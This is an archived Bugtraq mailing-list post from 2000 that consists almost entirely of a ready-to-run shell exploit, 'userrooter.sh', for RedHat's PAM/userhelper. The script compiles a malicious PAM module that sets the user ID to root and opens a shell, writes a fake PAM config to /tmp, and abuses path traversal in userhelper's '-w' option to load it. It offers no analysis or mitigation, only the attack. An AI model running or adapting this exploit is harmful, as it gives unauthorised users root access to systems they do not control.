[13237] in bugtraq
userhelper/PAM exploit
daemon@ATHENA.MIT.EDU (Derek Callaway)
Wed Jan 5 13:37:37 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10001050019530.8562-100000@pager.ce.net>
Date: Wed, 5 Jan 2000 00:21:26 -0500
Reply-To: Derek Callaway <super@CE.NET>
From: Derek Callaway <super@CE.NET>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
#!/bin/sh
# userrooter.sh by S <super@innu.org>
# RedHat PAM/userhelper(8) exploit
# Hi to inNUENdo!
LAME=`rpm -qf /usr/sbin/userhelper | awk -F'-' '{print $2}' | awk -F'.' '{print $2}'`
if [ $LAME -gt 15 ]
then echo "Machine doesn't appear to be vulnerable :-\\"
echo "Trying anyway..."
fi
cat << EOF >/tmp/hello-root.c
#include<unistd.h>
#include<stdlib.h>
void pam_sm_authenticate(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
void pam_sm_setcred(void){
setuid(0);
puts("userrooter by S");
system("/bin/sh");
exit(EXIT_SUCCESS);
}
EOF
cat << EOF >/tmp/login
#%PAM-1.0
auth required /tmp/pamper.so
EOF
gcc -shared -fPIC -O2 -o /tmp/pamper.so /tmp/hello-root.c
rm /tmp/hello-root.c
chmod 0700 /tmp/login
/usr/sbin/userhelper -w ../../../tmp/login
rm /tmp/pamper.so
rm /tmp/login
--
/* Derek Callaway <super@ce.net> char *sites[]={"http://www.geekwise.com",
Programmer; CE Net, Inc. "http://www.freezersearch.com/index.cfm?aff=dhc",
(302) 854-5440 Ext. 206 "http://www.homeworkhelp.org",0}; */
